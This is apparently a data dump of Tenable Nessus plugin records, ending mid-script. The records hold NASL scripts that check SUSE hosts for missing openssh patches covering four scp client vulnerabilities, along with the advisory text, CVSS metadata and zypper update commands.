update for openssh fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-20685/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6109/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6111/\"\n );\n # 
https://www.suse.com/support/update/announcement/2019/suse-su-20190126-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8e5cb3b1\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15:zypper in -t\npatch SUSE-SLE-Module-Server-Applications-15-2019-126=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-126=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2019-126=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2019-126=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:openssh-cavs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-askpass-gnome-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-cavs-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-cavs-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-debugsource-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-fips-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-helpers-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-helpers-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-askpass-gnome-7.6p1-9.13.1\")) flag++;\nif 
(rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-cavs-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-cavs-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-debugsource-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-helpers-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-helpers-debuginfo-7.6p1-9.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-03-18T03:04:06", "description": "This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. 
by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-22T00:00:00", "title": "SUSE SLES12 Security Update : openssh (SUSE-SU-2019:0125-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-22T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2019-0125-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121295", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0125-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121295);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"SUSE SLES12 Security Update : openssh (SUSE-SU-2019:0125-1)\");\n script_summary(english:\"Checks rpm output 
for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-20685/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6109/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6111/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190125-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8367f10f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2019-125=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2019-125=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debugsource-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-fips-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debugsource-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-fips-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-debuginfo-6.6p1-54.26.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T14:59:16", "description": "This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-22T00:00:00", "title": "SUSE SLES11 Security Update : openssh (SUSE-SU-2019:13931-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-22T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-fips"], "id": "SUSE_SU-2019-13931-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:13931-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121306);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"SUSE SLES11 Security Update : openssh (SUSE-SU-2019:13931-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would 
allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-20685/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6109/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6111/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-201913931-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af257c04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE 
recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-openssh-13931=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-openssh-13931=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
